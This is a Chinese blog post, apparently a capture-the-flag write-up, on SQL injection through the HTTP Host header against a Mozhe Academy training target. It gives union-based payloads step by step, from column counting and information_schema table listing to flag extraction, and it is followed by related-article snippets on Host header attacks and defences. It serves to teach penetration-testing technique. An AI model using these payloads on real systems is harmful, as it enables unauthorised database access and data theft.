每周积累|host头注入

最新推荐文章于 2024-05-27 23:13:14 发布
最新推荐文章于 2024-05-27 23:13:14 发布
阅读量1k 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/z45-1/p/10746316.html
版权

本周看了一些host头注入的文章,现在来实际实验一下。

1.对比常见的Get、Post注入,http头注入比较少见,

可能的注入点大多是下面三类:

Host:[host];

User-Agent:

Cookie:

host注入和平时进行的手工注入是一样的,只不过位置是在Host头处。基本命令也是一样的,本次实验就当对之前学习的手工注入进行复习了。

2.实验环境:墨者学院在线靶场

目的:获取flag。

 

3.开始实验:

因为猜解的payload比较多,只列举几个吧。可参考https://www.freebuf.com/articles/web/120747.html

就当重新复习一下吧。

首先使用burpsuite抓包,会抓到一个Post和一个Get请求:

接着将Get请求发送到Reapeater中,先发送原数据包看看:

再修改host数据发送看看,

1>猜解SQL查询语句中的字段数: order by 1#,没有报错

输入order by 5#,返回一条错误语句,经实验发现存在4个字段。

2>获取当前数据库:输入union select 1,2,3database(),返回数据库名

3>拿表:union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() #,发现存在四个表

根据前面的提示,猜测flag就是我们要的表

 

 4>拿flag,输入union select 1,2,3,group_concat(flag) from flag

5.去前台输入key,

 

转载于:https://www.cnblogs.com/z45-1/p/10746316.html

anma5413
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【墨者】HTTP注入实战(host注入
m0_60945802的博客
03-18 7271
【墨者】HTTP注入实战(host注入) 本小白在学习这个靶场的时候,遇到了一些困惑,查找了一些资料,希望能到帮到大家。
超详细http host注入攻击原理详解及漏洞利用
madao1o_o的博客
07-22 8330
01 漏洞描述 《HTTP | HTTP报文》最后一节,简单的介绍了一下首部字段,其中就包含了Host首部字段。 为了方便获取网站域名,开发人员一般依赖于请求包中的Host首部字段。例如,在php里用_SERVER[“HTTP_HOST”]。但是这个Host字段值是不可信赖的(可通过HTTP代理工具篡改),如果应用程序没有对Host字段值进行处理,就有可能造成恶意代码的传入。 02 漏洞知识拓展 Host首部字段是HTTP/1.1新增的,旨在告诉服务器,客户端请求的主机名和端口号,主要用来实现虚拟主机技术。
host攻击.pdf
05-07
URL存在http host攻击漏洞-修复方案
Host攻击
最新发布
wfdfg的博客
05-27 2416
(也被称为HTTP Host注入攻击)是一种Web安全漏洞,攻击者通过篡改HTTP请求中的Host部字段来执行恶意操作。在HTTP协议中,Host部字段用于指定请求所针对的域名,以便服务器能够正确地将请求路由到相应的Web应用程序。
安全测试中Host注入问题及解决方案
m0_37492923的博客
09-07 770
如上图中,我们的IP地址假设为192.168.1.32,安全测试时,拦截下来向1.32服务器的请求,将host更改为www.baidu.com后,放行请求,发现去其他服务器进行请求。上述代码的意思是,如果请求的host不是这两个地址发来的,最终会返回403错误信息,而不会请求到更改后的服务器IP。其问题主要原因是安全配置错误,导致生成的链接地址不是正确的地址,而攻击者设定的地址,从而使用户访问了恶意网站。如果我们使用nginx中间件,则可以在nginx配置文件(nginx.conf)中,加入判断。
关于Host的一些漏洞
weixin_59571952的博客
07-31 3262
关于Host的一些漏洞
host注入漏洞--中危
qq_44504968的博客
03-23 2766
host注入漏洞--中危漏洞原理漏洞知识扩展漏洞验证情况一情况二修复方案 漏洞原理 为了方便获取网站域名,开发人员一般依赖于请求包中的Host首部字段。例如,在php里用_SERVER[“HTTP_HOST”]。但是这个Host字段值是不可信赖的(可通过HTTP代理工具篡改),如果应用程序没有对Host字段值进行处理,就有可能造成恶意代码的传入。 漏洞知识扩展 Host首部字段是HTTP/1.1新增的,旨在告诉服务器,客户端请求的主机名和端口号,主要用来实现虚拟主机技术。 运用虚拟主机技术,单个主机可
利用HTTPhost攻击的技术
01-30
一般通用web程序是如果...Hostheader(比如在php里是_SERVER["HTTP_HOST"]),而这个header很多情况下是靠不住的。而很多应用是直接把这个值不做html编码便输出到了页面中,比如:还有的地方还包含有secretkey和token,
host攻击代码Demo.rar
10-29
【标题】"host攻击代码Demo.rar"是一个包含示例代码的压缩文件,主要展示了如何防范Web应用中的Host部攻击。Host攻击是网络安全领域的一个重要话题,它涉及到HTTP协议中的Host字段,攻击者可以通过篡改这个...
host主机漏洞解决.zip
09-28
标题中的“host主机漏洞”是指在Web服务器配置中,如果允许任意的主机Host Header)请求,可能会导致安全问题。主机是HTTP请求的一部分,用于标识客户端想要访问的服务器域名。当服务器配置不当,它可能响应...
PyPI 官网下载 | host.api-0.1.0.tar.gz
02-01
标题 "PyPI 官网下载 | host.api-0.1.0.tar.gz" 提到的是一个在Python Package Index (PyPI) 上发布的软件包。PyPI是Python开发者发布和分享他们编写的开源软件的地方,方便其他用户安装和使用。这个特定的包名为 ...
让你成为网络世界中有破坏力的人-HTTP报文HOST攻击
Eason_LYC安全白帽子的成长博客
05-19 2424
文中有彩蛋哦。随我的文章细细读来,让你成为一个在网络世界中有破坏力的人! tips:请遵守国家相关法律法规。在专用靶场或取得合法授权情况下进行安全渗透测试。
Web渗透测试之HTTP注入Host实现密码重置中毒(一)
vodkaDL的博客
12-13 869
文章目录
HTTP host攻击的技术
热门推荐
u012903926的专栏
08-15 2万+
一个有漏洞的JSP代码案例: 使用HTTP代理工具,如BurpSuite篡改HTTP报文部中HOST字段时,加红框中变量即客户端提交的HOST值,该值可被注入恶意代码。 request.getServerName( )方法引用HTTP报文部中HOST字段 该值在http1.0还会影响到Location的值 Location 是用来重定向接收方到非请求URL的位置来完成请求或标识新的...
检测到目标url存在框架注入漏洞_HOST注入攻击剖析
weixin_39609500的博客
12-15 3732
关于网站的渗透测试可能师傅们都有自己一套思路,有个共同点就是目标网站基本属于全静态页面,几乎很少存在动态参数这时意味着客户端无法通过提交参数形式进行测试,理论上也规避掉了许多风险。既然无法从参数层面进行测试,那么考虑尝试下修改header中的值看看是否被服务端允许,比如HOST值一HOST概念 host作为Request Header中不可或缺的一部分,大家知...
host攻击漏洞修复方案
mjm_1251162714的博客
03-28 9763
检测到目标URL存在http host攻击漏洞 简介 绿盟科技扫描到网站存在http host攻击漏洞,需要对该漏洞进行修复,网站后台是用java写的,对于这种host攻击的方式,有很多种方式避免。 如从源考虑的话,一般网站都配置了nginx或者部署在Apache上面,可以在nginx或者Apache上拦截非法请求的;由于我是在本机上测试的,项目是部署在tomcat上,故无法验证ngin...
host注入
weixin_34356138的博客
01-14 741
看到有说这个题为出题而出题,其实我还是这么觉得, host出问题的话我觉得一般只有在审计代码,看到才知道有host注入 假设不提示host注入,就有难度了 常规的注入了 转载于:https://www.cnblogs.com/haozhizhi/p/10266468.html...
Web渗透测试之HTTP注入Host实现身份验证绕过
vodkaDL的博客
12-04 2090
文章目录前言题目分析总结 前言 本篇将讲解在Host参数存在注入漏洞时,如何利用burpsuite修改Host参数实现身份验证绕过并达到我们想要的目的。 题目分析 题目页面如下: 既然要利用Host参数实现注入操作,那么就必须得先确认Host是否存在漏洞。有时为了防止服务器收到无法识别的域名请求,会将服务器配置为后备选项。当服务器设置为后备选项时,即便Host标示的域名不正确也会返回默认的网站。在这种情境下,我们就可以直接修改Host来确认是否可以进行注入。 但在大部分情况下,如果直接修改Host,由于H
墨者学院sqlmap Host注入
07-28
使用SQLMap进行Host注入的步骤如下: 1. 首先,确认目标网站存在Host注入漏洞。可以通过手动尝试修改Host字段并观察响应来确认漏洞存在与否。 2. 下载并安装SQLMap工具。可以从墨者学院的官方网站或GitHub仓库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值